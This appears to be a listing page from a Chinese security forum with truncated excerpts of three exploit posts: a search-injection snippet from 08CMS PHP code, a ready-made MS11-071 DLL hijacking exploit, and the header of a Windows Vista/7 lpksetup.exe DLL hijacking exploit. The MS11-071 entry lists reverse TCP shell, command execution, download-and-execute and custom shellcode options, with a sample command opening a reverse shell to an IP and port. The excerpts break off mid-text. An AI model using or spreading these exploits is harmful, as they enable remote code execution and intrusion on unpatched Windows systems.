08CMS 小说搜索型注入 - 脚本漏洞

    By:xiaoCon     大牛别拍砖,第一次发。 以下是引用片段: //搜索词预处理 $searchword = empty($searchword) ? '' : cutstr(trim($searchword),50,''); $_da['searchword'] = $searchword; if($searchword){         $filterstr .= ($filterstr ? '&' : '').'searchword='.rawurlencode(stripslashes($searchword)); } //预处理搜索模式:标

【首发】MS11-071 DLL Hijacking Exploit v1.0

MS11-071.exe: MS11-071 DLL Hijacking Exploit v1.0 By: Nuclear'Atk Url: https://lcx.cc/ At: 2011-9-25 20:10:50 About: https://lcx.cc/post/1795/ MS11-071: https://lcx.cc/post/1792/ Test On:     Windows XP SP1,SP2,SP3     Windows Server 2003 SP1,SP2,SP3,R2 Options:     1.Reverse TCP Shell     2.Execute CMD Command     3.Http Download & Exec     4.Custom ShellCode (Length < 1000) Example:     1.MS11-071.exe -1 192.168.1.1 9999     2.MS11-071.exe -2 cmd.exe

Windows Vista/7 lpksetup.exe (oci.dll) DLL Hijacking

Windows Vista / 7 lpksetup.exe 的 DLL 劫持,Windows Vista/7 lpksetup.exe (oci.dll) DLL Hijacking。 /* Exploit: Windows Vista/7 lpksetup.exe (oci.dll) DLL Hijacking Vulnerability Extension: .mlc Author: Tyler Borland (tborland1@gmail.com) Date: 10/20/2010 Tested on: Windows 7 Ultimate (Windows Vista Ultimate/Enterpries and Windows 7 Enterprise should be vulnerable as well) Effect: Remote Code Execution lpksetup